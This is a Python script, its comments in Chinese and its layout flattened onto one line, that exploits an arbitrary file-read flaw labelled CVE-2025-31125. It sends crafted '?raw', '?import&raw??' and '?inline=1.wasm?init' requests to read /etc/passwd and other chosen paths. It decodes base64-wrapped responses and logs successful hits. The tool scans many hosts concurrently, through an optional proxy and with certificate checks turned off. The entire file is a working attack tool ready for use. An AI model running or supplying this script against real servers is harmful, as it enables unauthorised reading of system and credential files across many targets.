import base64 import requests import argparse import urllib3 import concurrent.futures import re import time import threading from urllib.parse import urljoin from colorama import Fore, Style, init # 初始化 colorama(使其在 Windows 中也能支持颜色) init(autoreset=True) # Suppress SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # 最大重试次数 RETRY_LIMIT = 3 # 创建全局锁 print_lock = threading.Lock() CVE_2025_31125_base_pattern = r''' data:text/plain;base64, # 固定前缀 (["']?) # 可选引号(支持单/双引号或无引号) ( (?:[A-Za-z0-9+/]{4})* # 标准分组(每4字符) (?:[A-Za-z0-9+/]{3}= # 允许1个填充符 | [A-Za-z0-9+/]{2}==)? # 允许2个填充符 ) \1 # 闭合引号(若存在) ''' def sanitize_filename(url): """ 清理 URL 作为文件名,防止非法字符 """ safe_name = re.sub(r'[^\w\-]', '_', url) # 替换非法字符 safe_name = re.sub(r'_+', '_', safe_name) # 去重 `_` safe_name = safe_name.strip('_') # 移除开头/结尾的 `_` return safe_name def fetch_url(url, proxy, retries=0): """ 访问 URL,支持重试 """ proxies = {"http": proxy, "https": proxy} if proxy else None try: response = requests.get(url, timeout=5, verify=False, proxies=proxies, allow_redirects=False) if response.status_code == 200: return response.text else: with print_lock: print(f"[FAIL] {url}") return None except requests.exceptions.RequestException: if retries < RETRY_LIMIT: wait_time = 2 ** retries # 指数退避 time.sleep(wait_time) return fetch_url(url, proxy, retries + 1) else: with print_lock: print(f"[ERROR] {url} Connection error") return None def check_path(base_url, path, proxy, output_file): url1 = urljoin(base_url, path) + "?raw" url2 = urljoin(base_url, path) + "?import&raw??" url3 = urljoin(base_url, path) + "?import&?inline=1.wasm?init" with concurrent.futures.ThreadPoolExecutor(max_workers=2) as inner_executor: future1 = inner_executor.submit(fetch_url, url1, proxy) future2 = inner_executor.submit(fetch_url, url2, proxy) future3 = inner_executor.submit(fetch_url, url3, proxy) content1 = future1.result() content2 = future2.result() content3 = future3.result() match = re.search(CVE_2025_31125_base_pattern, content3 ,re.VERBOSE) if match: base64_content = match.group(2) content3 = base64.b64decode(base64_content) content3 = content3.decode("utf-8") # 写入成功 URL 到文件,并且同时打印到控制台 if content1 and "root:" in content1: with print_lock: print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url1}") with open(output_file, "a", encoding="utf-8") as f: f.write(f"[SUCCESS] {url1}\n") return url1 elif content2 and "root:" in content2: with print_lock: print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url2}") with open(output_file, "a", encoding="utf-8") as f: f.write(f"[SUCCESS] {url2}\n") return url2 elif content3 and "root:" in content3: with print_lock: print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {url3}") with open(output_file, "a", encoding="utf-8") as f: f.write(f"[SUCCESS] {url3}\n") return url3 else: with print_lock: print(f"[FAIL] {url1}") print(f"[FAIL] {url2}") print(f"[FAIL] {url3}") return None def check_url(base_url, paths, proxy, output_file): results = [] with concurrent.futures.ThreadPoolExecutor() as executor: future_to_path = {executor.submit(check_path, base_url, path, proxy, output_file): path for path in paths} for future in concurrent.futures.as_completed(future_to_path): res = future.result() if res: results.append(res) return results def check_urls_from_file(file_path, paths, proxy): with open(file_path, 'r', encoding="utf-8") as file: links = [line.strip() for line in file.readlines()] with print_lock: print(f"[INFO] Processing {len(links)} base URLs concurrently.") output_file = "output.txt" with open(output_file, "a", encoding="utf-8") as f: results = [] with concurrent.futures.ThreadPoolExecutor() as executor: future_to_link = {executor.submit(check_url, link, paths, proxy, output_file): link for link in links} for future in concurrent.futures.as_completed(future_to_link): res = future.result() if res: results.extend(res) return results def check_urls_from_dict(paths, proxy): output_file = "output.txt" with open(output_file, "a", encoding="utf-8") as f: results = [] with concurrent.futures.ThreadPoolExecutor() as executor: future_to_path = {executor.submit(fetch_url, path, proxy): path for path in paths} for future in concurrent.futures.as_completed(future_to_path): path = future_to_path[future] content = future.result() if content and "root:" in content: with print_lock: print(f"[{Fore.RED}SUCCESS{Style.RESET_ALL}] {path}") f.write(f"[SUCCESS] {path}\n") results.append(path) else: with print_lock: print(f"[FAIL] {path}") return results if __name__ == "__main__": parser = argparse.ArgumentParser(description="Batch check access to multiple paths on multiple links") parser.add_argument("-f", "--file", help="File containing base links") parser.add_argument("-u", "--url", help="Target URL") parser.add_argument("-p", "--payload", default='/etc/passwd', help="Target file path") parser.add_argument("-d", "--dict", help="File containing list of paths to append to base URL") parser.add_argument("--proxy", help="Proxy server (e.g., http://proxy:port)") args = parser.parse_args() paths = [] if args.dict: with open(args.dict, 'r') as dict_file: paths = [line.strip() for line in dict_file.readlines()] elif args.payload: paths.append(args.payload) if args.url: check_url(args.url, paths, args.proxy, "output.txt") elif args.file: check_urls_from_file(args.file, paths, args.proxy) elif args.dict: check_urls_from_dict(paths, args.proxy) else: print("Usage: python3 script.py -h")